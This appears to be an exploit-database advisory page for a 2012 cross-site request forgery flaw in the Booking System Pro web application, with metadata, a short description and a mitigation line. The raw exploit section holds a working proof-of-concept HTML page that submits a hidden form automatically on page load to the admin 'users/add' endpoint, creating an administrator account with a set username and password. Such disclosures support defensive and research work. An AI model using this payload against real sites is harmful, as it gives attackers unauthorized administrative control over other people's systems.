Booking System Pro CSRF Vulnerability

vendor:

Booking System Pro

by:

DaOne

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Booking System Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Booking System Pro CSRF Vulnerability

This exploit allows an attacker to add an admin user to the Booking System Pro application. The attacker can craft a malicious HTML page that contains a form with hidden fields that contain the admin user credentials. When the victim visits the malicious page, the form is automatically submitted and the admin user is added to the application.

Mitigation:

Implementing CSRF protection tokens, validating the HTTP Referer header, and using CAPTCHA can help mitigate CSRF attacks.

Source

Exploit-DB raw data:

# Exploit Title: Booking System Pro CSRF Vulnerability
# Date: 28/08/2012
# Author: DaOne (@LibyanCA)
# Vendor: http://www.neptunescripts.com/products
# Price: $39


# CSRF Add Admin

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/admin/users/add">
<input type="hidden" name="data[User][name]" value="webadmin"/>
<input type="hidden" name="data[User][username]" value="webadmin">
<input type="hidden" name="data[User][password]" value="pass123">
<input type="hidden" name="data[User][email]" value="admin@email.com">
<input type="hidden" name="data[User][phone]" value=""/>
<input type="hidden" name="data[User][role]" value="admin"/>
</form>
</body>
</html>